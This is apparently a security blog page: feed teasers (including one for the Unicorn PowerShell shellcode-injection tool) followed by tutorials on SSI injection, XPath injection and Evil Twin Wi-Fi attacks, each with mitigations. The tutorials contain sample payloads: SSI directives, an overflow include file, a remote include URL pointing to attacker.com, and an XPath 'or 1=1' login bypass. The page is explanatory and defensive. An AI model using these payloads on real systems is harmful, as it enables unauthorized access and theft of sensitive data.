Up1 – Client Side Encrypted Image Host

Up1 – Client Side Encrypted Image Host
Up1 is a client side encrypted image host that that can also encrypt text, and other data, and then store them, with the server knowing nothing about the contents. It has the ability to view images, text with syntax highlighting, short videos, and arbitrary binaries as downloadables. How it Works Before an image is uploaded, […]

The post…

Read the full post at darknet.org.uk


New feed

Criminal Rings Hijacking Unused IPv4 Address Spaces

Criminal Rings Hijacking Unused IPv4 Address Spaces
So apparently this Hijacking Unused IPv addresses has been going on for a while, but with quite a lot number of attempts recently it’s ramped up a LOT since the September announcement by ARIN about IPv4 depletion. There was only only 50 hijacking attempts between 2005 and 2015. Since September, ARIN has already seen 25 […]

The post Criminal…

Read the full post at darknet.org.uk


New feed

Cuckoo Sandbox – Automated Malware Analysis System

Cuckoo Sandbox – Automated Malware Analysis System
Cuckoo Sandbox is Open Source software for automating analysis of suspicious files. To do so it makes use of custom components that monitor the behaviour of the malicious processes while running in an isolated environment. In other words, you can throw any suspicious file at it and in a matter of seconds Cuckoo will provide […]

The post…

Read the full post at darknet.org.uk


New feed

Unicorn – PowerShell Downgrade Attack

Unicorn – PowerShell Downgrade Attack
Magic Unicorn is a simple tool for using a PowerShell downgrade attack to inject shellcode straight into memory. Based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the…

Read the full post at darknet.org.uk


New feed

Web Application Log Forensics After a Hack

Web Application Log Forensics After a Hack
Sites get hacked, it’s not pleasant but it happens. A critical part of it, especially in my experience, has been the web application log forensics applied directly after an attack. You can usually piece together what happened, especially if the attacker doesn’t rotate IP addresses during the attack. With a little poking around and after…

Read the full post at darknet.org.uk


New feed

movfuscator – Compile Into ONLY mov Instructions

movfuscator – Compile Into ONLY mov Instructions
The M/o/Vfuscator (short ‘o’, sounds like “mobfuscator”) helps programs compile into only mov instructions, and nothing else – no cheating. Arithmetic, comparisons, jumps, function calls, and everything else a program needs are all performed through mov operations; there is no self-modifying code, no transport-triggered calculation, and no other…

Read the full post at darknet.org.uk


New feed

What is a Server Side Include Injection Attack or SSI Injection Attack ?

Many a times attackers exploit security vulnerabilities in web applications and inject their malicious codes into the server to steal sensitive data, spread malware or do other malicious activities. Server Side Includes Injection Attack or SSI Injection Attack is one such attack.
In SSI Injection Attack, the attacker takes advantage of security vulnerabilities of web applications to inject their malicious code using Server Side Includes directives and perpetrate the attacks.
What is Server Side Includes or SSI ?
Nowadays, most of the web servers handle dynamic pages. It takes input from the user in the form of text box, radio buttons, pictures etc and the information is passed to a program in the web server, which then processes the information and generates output. The output is sent back to our browser and our browser finally displays the HTML page.
But, at times dynamically generating the whole page becomes inefficient and it is not needed too. Instead, a part of the page content can be dynamically generated and it can be added to an existing HTML page. Server Side Includes are directives that are used for that purpose. Using these directives, dynamic contents can be embedded to an existing HTML page and then displayed.
For example, a webpage may display local date and time to a visitor. Dynamically generating the page every time using some program or dynamic technology may prove to be inefficient. Instead, one can put the following SSI directive to an existing HTML page :
<!–#echo var=”DATE_LOCAL” –>
As a result, whenever the page will be served to the client, this particular fragment will be evaluated and replaced with the current local date and time :
Sunday, 25-Jan-2016 12:00:00 EST
The decision of whether to use SSI directives to dynamically generate a particular fragment of the page or to dynamically generate the whole page using some dynamic technology, often depends on how much of the page is to be dynamically generated. If a major part of the page content is to be dynamically generated, then SSI may not be a good solution.
Server Side Includes Injection Attack or SSI Injection Attack
In SSI Injection Attack, the attacker first finds out whether a web application is vulnerable to Server Side Includes Injection or SSI Injection. Normally, a web application is vulnerable to SSI Injection through manipulation of existing SSI directives in use or through lacking in proper validation of user inputs.
If a web application has pages with extension .stm, .shtm, .shtml, then that would indicate to the attackers that the web application is using SSI directives to dynamically generate page contents. At this point, if the web server permits SSI execution without proper validation, then the attacker can trick the webserver to execute SSI directives to manipulate filesystem of the web server and thus, to add, modify and delete files or to display content of sensitive files like /etc/passwd.
On the other hand, the attacker can type the following characters in the user input field to find out whether the web application properly validates the user inputs :
< ! # = / . " - > and [a-zA-Z0-9]
As these are the characters often used by SSI directives, the web application will become vulnerable to SSI Injection if it cannot properly validate the user inputs and allow these characters to be present in the input when they are not expected. The attacker can take advantage of that and access sensitive information or execute shell commands for nefarious purposes.
As the SSI directives are executed before supplying the page content to the client, the data intended for the attack will be displayed the next time the webpage is loaded.
Example
Suppose, a web application is vulnerable to SSI Injection. At this point, the attacker can trick the web server to execute the following SSI directive and display current document filename :
<!–#echo var=”DOCUMENT_NAME” –>
The attacker can create a file attack.shtml with the following content :
attack.shtml

<!–#include file=”AAAA….AAAA” –>

with number of A’s more than 2049.
At this point, suppose the web application loads a legitimate URL like :
vulnerable.com/index.asp?page=about.asp
Now, the attacker can include his own file attack.shtml in the web application like :
vulnerable.com/index.asp?page=attacker.com/index.asp?page=attack.shtml


If the web server returns a blank page, that would indicate an overflow has occurred. So, the attacker can now get enough information to trick the web application to execute malicious code.



How To Stay Safe
- User inputs should be properly validated so that it does not contain characters like <, !, #, =, /, ., ", -, > and [a-zA-Z0-9] if they are not needed.
- Make sure the web server only executes SSI directives needed for a particular web page.
- HTML entity encode user inputs before passing it to a page that executes SSI directives.
- Make sure a page is executed with the permission of the file owner, instead of that of the web server user.


Being informed about various web application security vulnerabilities is the very first step towards safeguarding a web application. Hope this article served its purpose.

XPath Injection Attack

What is XPath
Many web applications use XML or EXtensible Markup Language to store and transport data in both human readable and machine readable format. It is often used to separate data from presentation.
To give an example, a web server may store data in separate XML files and write a small JavaScript code to read the XML files and update the contents of HTML pages.
XSLT or EXtensible Stylesheet Language Transformations is a recommended stylesheet language for XML, which is used to transform an XML document into HTML.
XPath is a major element in XSLT. It is used in XSLT to navigate through an XML document to find out required information.
To give an example, let’s consider this XML document :
<?xml version=”1.0″ encoding=”UTF-8″?>

<bookstore>

<book category=”HACKING”>
<title lang=”en”>Learn Hacking</title>
<author>Tony Stark</author>
<year>1995</year>
<price>50.00</price>
</book>

</bookstore>
In a modern browser, you can load the XML document using :
var xmlhttprequest=new XMLHttpRequest()
And, the following XPath query will select the title of the book from the XML document :
xpath=”/bookstore/book/title”;
xmlDoc.evaluate(xpath, xmlDoc, null, XPathResult.ANY_TYPE, null);
What is XPath Injection Attack
Let’s understand this with an example.

Suppose, we have an authentication system on a webpage which takes inputs of username and password from the user and uses XPath to look up the following XML document to find out the proper user.
<?xml version=”1.0″ encoding=”utf-8″?>
<Users>
<User ID=”1”>
<FirstName>Tony</FirstName>
<LastName>Stark</LastName>
<UserName>AnthonyStark</UserName>
<Password>SecretForJarvis</Password>
<Type>Admin</Type>
</User>
<User ID=”2”>
<FirstName>Arnold</FirstName>
<LastName>Cook</LastName>
<UserName>ACook</UserName>
<Password>SecretForArnold</Password>
<Type>User</Type>
</User>
</Users>
Let’s consider it uses the following XPath to look for the user :
FindUserXPath = “//User[UserName/text()='” & Request(“Username”) & “‘ and Password/text()='” & Request(“Password”) & “‘]”
So, an attacker can send a malicious username and password in the web application to select XML nodes without knowing any actual username and password.
Username: blah’ or 1=1 or ‘a’=’a
Password: blah
So, logically FindUserXPath becomes equivalent to :
//User[(UserName/text()=’blah’ or 1=1) or
(‘a’=’a’ and Password/text()=’blah’)]
As the first part of the XPath is always true, the password part becomes irrelevant and the UserName part matches the admin. And thus, it can now reveal sensitive information from the server to the attacker, which the attacker can exploit for malicious purposes. And, the web application becomes vulnerable to XPath Injection Attack.
Usage
  • Use a parameterized XPath interface whenever possible.
  • Construct the XPath query dynamically and escape the user inputs properly.
  • In a dynamically constructed XPath query, if you are using quotes to terminate untrusted input, then make sure to escape that quote in the untrusted input, so that the untrusted input cannot try to break out of the quoted part. For example, if single quote (‘) is used to terminate the input username, then replace any single quote (‘) character in the XPath query with XML encoded version of that character, for example “&apos;”
  • Using precompiled XPath query is always good. With this, the user inputs get escaped properly without missing any character that should have been escaped.

Intro to Evil Twin in Wireless Networks

What is Evil Twin
Evil Twin is basically a rogue Wi-Fi access point. It may look very similar to a legitimate one. But, it actually is a Wi-Fi access point controlled by attackers. Most of the time, it contains an SSID or Service Set Identifier of the access point very much similar to the legitimate one. Sometimes, it even provides signal stronger than the legitimate ones so that it can attract attention easily. But, it is actually controlled by the attackers. So, any data traveled through that Evil Twin Wi-Fi access point can be intercepted by attackers.
Purpose of Evil Twin
Attackers make Evil Twin mainly for stealing sensitive data or for other Phishing attacks. If a victim connects to an Evil Twin, any non-HTTPS data can be easily intercepted, as it travels through the attackers’ equipment. So, if the user logs in to unprotected bank or email account, the attacker will have access to the entire transaction.
The victim may even be tricked with a login prompt of attacker’s server, tempting him to provide sensitive information like usernames and password and resulting in a Phishing attack.
 
How is Evil Twin created
An Evil Twin can easily be created by an attacker with a smartphone or computer and with some easily available software. The attacker first places himself near a legitimate Wi-Fi hotspot and finds out the SSID or Service Set Identifier and signal strength of the access point. Now, he sends his radio signal using the same or very similar SSID. The attacker may even position himself near the potential victims so that his signal can lure the victims. Some attackers even use some software to deauthenticate the victims from legitimate Wi-Fi access point, so that when they connect back they would connect to the Evil Twin, as it provides stronger signal.
Mitigation
  • It is always a good idea to use VPN. It creates an encrypted tunnel before transmitting data. As a result, it is hard for the attacker to intercept that data.
  • Some software like EvilAP_Defender can be used by network administrator to detect Evil Twin. They try to find out :
          • Wi-Fi access points with similar SSID, but different BSSID or MAC address of wireless access point.
          • same BSSID as the legitimate one, but with different attributes like channel, cipher, privacy protocol, authentication etc.
          • Even with same BSSID and attributes as the legitimate access point, but with different tagged parameter like OUI or Organizationally Unique Identifier which is assigned by the IEEE registration authority.
  • Before connecting to a Wi-Fi do not just rely on the name of the wireless access point, instead verify whether it is a legitimate one.
  • It is always better to restrict browsing only to websites that do not require any sensitive data like login credentials while using a public Wi-Fi.
  • Avoid providing any sensitive information even any website or login screen asks for that while using public Wi-Fi.
So, beware of all the security vulnerabilities and recent threats and stay safe, stay secured.